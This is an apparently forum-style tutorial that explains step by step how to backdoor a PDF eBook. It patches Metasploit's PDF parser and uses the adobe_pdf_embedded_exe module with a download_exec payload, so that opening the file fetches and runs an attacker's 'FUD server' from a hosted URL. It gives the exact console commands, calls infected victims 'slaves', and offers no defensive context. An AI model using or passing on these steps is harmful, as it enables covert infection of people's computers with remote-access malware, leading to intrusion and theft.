This guide will tell you how to backdoor a PDF. What this basically does is that it will download your server when someone opens your PDF file
Requirements:
Metasploit, a PDF eBook and a FUD server.Metasploit can be
downloaded Here
Search the web for free eBooks
Make your PDF file ready, upload your FUD server to a hosting service which provides direct download links, I would use Dropbox or DirectXEX
And make sure that you have installed Metasploit correctly!
1. Open up your Metasploit directory folder and go here:"C:\metasploit\apps\pro\msf3\lib\msf\core\exploit\pdf_parse.rb" - Open this file with EmEditor / Notepad.2. Change the "read_pdf()" function to:
PHP Code:
def read_pdf()
#stream = IO.read("#{datastore['INFILENAME']}")
stream = open("#{datastore['INFILENAME']}", "rb") {|io| io.read }
return stream
end
3. Reboot your computer!
4. When doing this exploit, find an old PDF file like this one in your directory:
"C:/metasploit/apps/pro/ui/public/docs/Phishing_QuickStartGuide.pdf"
Now we will infect the PDF file
1. Open up Metasploit console
2. Type this in the console:
use exploit/windows/fileformat/adobe_pdf_embedded_exe
3. Type this in the console:
set payload windows/download_exec
4. Type this in console:
set INFILENAME
EXAMPLE: set INFILENAME C:/Users/Owner/Desktop/example.pdf
5. Type this in console:
set url EXAMPLE: set url http://download.com/server.exe
6. Type this in console:
Exploit
Now you have infected your PDF file and you will be ready to send it out.
When people open the infected PDF file then it will download your server and *BAM* new slave.(The infected PDF file will be in the same directory as the original and will be named “evil.pdf”)
Sign up here with your email